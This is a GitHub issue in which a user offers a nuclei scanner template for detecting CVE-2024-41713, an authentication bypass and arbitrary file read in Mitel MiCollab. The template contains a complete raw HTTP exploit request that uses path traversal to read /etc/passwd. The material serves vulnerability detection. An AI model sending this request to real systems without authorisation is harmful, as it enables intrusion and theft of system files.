Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Mitel-CVE-2024-41713.yaml #11416

Open
halimB8 opened this issue Dec 26, 2024 · 0 comments
Open

Mitel-CVE-2024-41713.yaml #11416

halimB8 opened this issue Dec 26, 2024 · 0 comments
Assignees

Comments

@halimB8
Copy link

halimB8 commented Dec 26, 2024

Hello, I have created a nuclei template to detect CVE-2024-41713 (Testes against a vulnerable server, and detected it)

id: mitel-micollab-auth-bypass-file-read

info:
  name: Mitel MiCollab Authentication Bypass and Arbitrary File Read
  author: Abdelhalim ABO
  severity: critical
  description: |
    Exploits CVE-2024-41713, an authentication bypass vulnerability in Mitel MiCollab,
    to read arbitrary files from the target system.
  tags: mitel, auth-bypass, file-read, cve-2024-41713

variables:
  target_file: "/etc/passwd"

http:
  - payloads:
      target_file:
        - "{{target_file}}"

    raw:
      - |
        POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _transaction=<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">2</transactionNum><operations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><criteria xsi:type="xsd:Object"><reportName>../../../{{target_file}}</reportName></criteria><operationConfig xsi:type="xsd:Object"><dataSource>summary_reports</dataSource><operationType>fetch</operationType></operationConfig><appID>builtinApplication</appID><operation>downloadReport</operation><oldValues xsi:type="xsd:Object"><reportName>x.txt</reportName></oldValues></elem></operations><jscallback>x</jscallback></transaction>&protocolVersion=1.0&__iframeTarget__=x

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants